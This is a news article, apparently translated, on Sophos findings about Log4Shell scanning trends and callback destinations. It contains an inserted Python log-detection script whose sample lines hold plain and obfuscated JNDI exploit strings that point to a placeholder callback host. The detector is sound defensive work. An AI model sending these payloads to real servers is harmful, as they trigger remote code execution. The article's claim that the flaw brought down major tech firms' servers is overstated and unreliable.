Australian News


While the world has not seen massive exploitation of the Log4j security flaw, the flaw has burrowed deep into many apps and digital products, which are likely to be a target for exploitation in the years to come, and India is the top callback destination that vulnerable devices reach out to, new research from Sophos has revealed.

Thanks to the quick response from global security firms, there have so far been few major cyberattacks exploiting vulnerabilities in Apache Log4j, Chester Wisniewski, principal research scientist at Sophos, said in a blog post. However, Sophos believes that the immediate threat of attackers massively exploiting Log4Shell was averted because the severity of the bug brought the digital and security communities together and motivated people to act.

The Log4j vulnerability brought down the servers of major web technology giants such as Microsoft, Amazon, Apple, etc. For the uninitiated, Log4j is a very common logging library used by applications all over the world. Logging lets developers record and review activity in an application. The vulnerability is serious because exploiting it could allow hackers to take over Java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system.

Sophos data shows the top callback destinations around the world that vulnerable (unpatched) devices go to in order to retrieve a Java payload. This pushes India to the number one position and highlights Turkey, Brazil, the US and even Australia. It’s hard to speculate why these regions are top destinations for callbacks. One of the reasons Wisniewski gives is active participants in bug bounty programs, who hope to make money by being the first to alert organizations that they are exposed.

Operating volume

Wisniewski explains that in the early days scan volume was moderate; however, within a week there was a significant increase in scan detections, with numbers peaking between December 20 and 23, 2021.

However, from late December to January 2022, the curve of attack attempts flattened out and decreased. “This does not mean that the threat level has also decreased: at that time, an increasing percentage of detections were probably real attacks, and fewer came from researchers monitoring the status of the most recent patches,” the researcher noted.
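The scan and callback activity described above is what a defender actually sees in web-server logs: requests carrying a Log4j lookup string that, when the vulnerable library logs it, makes the server fetch a Java payload from an attacker-chosen callback host. The following is an added example (not Sophos's code or data) that normalizes the lookup-nesting tricks commonly used to disguise the `jndi` keyword, flags the requests, and tallies them per day and per callback host, which is the kind of count behind the "scan volume" and "top callback destination" observations. The log lines, hosts and IP addresses are constructed placeholders.

```python
import re
from collections import Counter

# Constructed sample access-log lines (placeholder hosts and RFC 5737 addresses, not real data).
SAMPLE_LOGS = [
    '2021-12-10T08:12:01Z 198.51.100.7 GET / "User-Agent: ${jndi:ldap://callback.example:1389/a}"',
    '2021-12-20T09:00:10Z 203.0.113.9 GET /login "User-Agent: Mozilla/5.0"',
    '2021-12-21T10:05:44Z 198.51.100.8 GET / "X-Api-Version: ${${lower:J}ndi:ldap://callback.example:1389/b}"',
    '2021-12-22T11:30:00Z 198.51.100.9 GET / "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:rmi://other.example:1099/c}"',
    '2022-01-05T12:00:00Z 203.0.113.10 GET /health "User-Agent: curl/7.79"',
]

# Innermost ${...} lookup: a body with no further braces or dollar signs.
LOOKUP_RE = re.compile(r'\$\{([^${}]*)\}')


def normalize(text):
    """Collapse nested Log4j lookups the way the vulnerable library would.

    Handles the three disguises seen most often in scanning traffic:
    ${lower:X} / ${upper:X} case lookups and ${name:key:-default} default
    values (including the empty ${::-x} form). Anything else, such as the
    jndi lookup itself, is left in place so the detector can match it.
    """
    def repl(match):
        body = match.group(1)
        if body.startswith('lower:'):
            return body[len('lower:'):].lower()
        if body.startswith('upper:'):
            return body[len('upper:'):].upper()
        if ':-' in body:
            return body.split(':-', 1)[1]
        return match.group(0)

    while True:
        collapsed = LOOKUP_RE.sub(repl, text)
        if collapsed == text:
            return text
        text = collapsed


# After normalization a lookup that would trigger a callback looks like ${jndi:<scheme>://<host>...
JNDI_RE = re.compile(r'\$\{jndi:([a-z]+)://([^/:}\s]+)', re.IGNORECASE)


def detect(line):
    """Return (scheme, callback_host) if the line carries a JNDI lookup, else None."""
    match = JNDI_RE.search(normalize(line))
    if not match:
        return None
    return match.group(1).lower(), match.group(2).lower()


def summarize(lines):
    """Count flagged requests per day (the scan-volume curve) and per callback host."""
    per_day = Counter()
    per_host = Counter()
    for line in lines:
        hit = detect(line)
        if hit is None:
            continue
        per_day[line[:10]] += 1      # ISO timestamp prefix is the date
        per_host[hit[1]] += 1
    return per_day, per_host


if __name__ == '__main__':
    days, hosts = summarize(SAMPLE_LOGS)
    print('flagged requests per day:', dict(days))
    print('callback hosts:', dict(hosts))
```

Matching only the literal `${jndi:` string misses most real scanning traffic, which is why the example resolves the nested lookups first; in production the same normalization belongs in the WAF or SIEM rule, and the callback-host tally is what you would enrich with GeoIP to get a per-country breakdown like the one Sophos reports.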

The threat continues

According to Wisniewski, the threat is not over yet. “Just because we’ve cleared the immediate iceberg doesn’t mean we’re risk-free.”

As others have pointed out, some of the initial attack activity may have resulted in attackers securing access to a vulnerable target without actually abusing that access, for example to deliver malware, so a successful breach may remain undetected.

In the past, Sophos has seen countries such as Iran and North Korea exploit VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy patches, then wait months before using that access in an attack.

Sophos believes that the attempted exploitation of the Log4Shell vulnerability will likely continue for years and become a favorite target of penetration testers and nation-state-backed threat actors alike. “The urgency of identifying where it is used in applications and updating software with the patch remains as critical as ever,” added the researcher.

